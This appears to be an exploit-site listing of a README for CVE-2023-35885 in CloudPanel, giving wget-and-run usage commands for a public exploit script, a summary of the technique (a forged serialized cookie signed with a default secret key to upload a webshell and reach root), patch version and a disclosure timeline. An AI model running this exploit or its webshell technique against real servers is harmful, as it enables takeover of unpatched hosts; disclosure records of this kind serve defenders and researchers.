Share
## https://sploitus.com/exploit?id=BCE99B28-1158-59D5-BB2F-4896DF10F673
# CVE-2023-35885
Cloudpanel 0-day Exploit

Author: @EagleTube, @Mzulfahmy, @farphalabs<br>
Github : https://github.com/datackmy/FallingSkies-CVE-2023-35885/blob/main/<br>
Affected version: v2.0.0 โ€“ v2.3.0<br>
Patched version: v2.3.1<br>
Vendor homepage: CloudPanel.io<br>
Product: CloudPanel<br>
References: https://www.datack.my/fallingskies-cloudpanel-0-day/ , [Write Up]

Usage : 
```
wget https://raw.githubusercontent.com/datackmy/FallingSkies-CVE-2023-35885/main/exploit2.py
chmod +x exploit2.py
python3 exploit2.py -T target_ip:target_port 
```
# PROOF OF CONCEPT
Upload webshell by inject encrypted "serialized" clp-fm cookie with default secret key.
<br><br>
<img src='Screenshots/firstrun.jpg'>

Uploaded Shell from automated python script.
<br><br>
<img src='Screenshots/uploadedshell.jpg'>

SSH user with already granted sudo privileges.
<br><br>
<img src='Screenshots/rooted.jpg'>

## PATCH VERSION
CloudPanel v2.3.1

## SPECIAL THANKS & REFERENCE
1. Datack Sdn Bhd (full writeup) <a href="https://www.datack.my/fallingskies-cloudpanel-0-day/">datack.my</a>
2. Maui <a href="https://sabily.info">sabily.info</a>
3. Mohamad Zulfahmy (@mzulfahmy)
4. Farhan Phakhruddin (@farpha)

## TIMELINE
01-06-2023 โ€“ Exploit Found<br>
12-06-2023 โ€“ Privately disclose to vendor<br>
13-06-2023 โ€“ Submitted to CVE assignee<br>
19-06-2023 โ€“ CVE number assigned by MITRE<br>
20-06-2023 โ€“ Patch released by the vendor (v2.3.1)<br>
20-07-2023 โ€“ Exploit released to the public<br>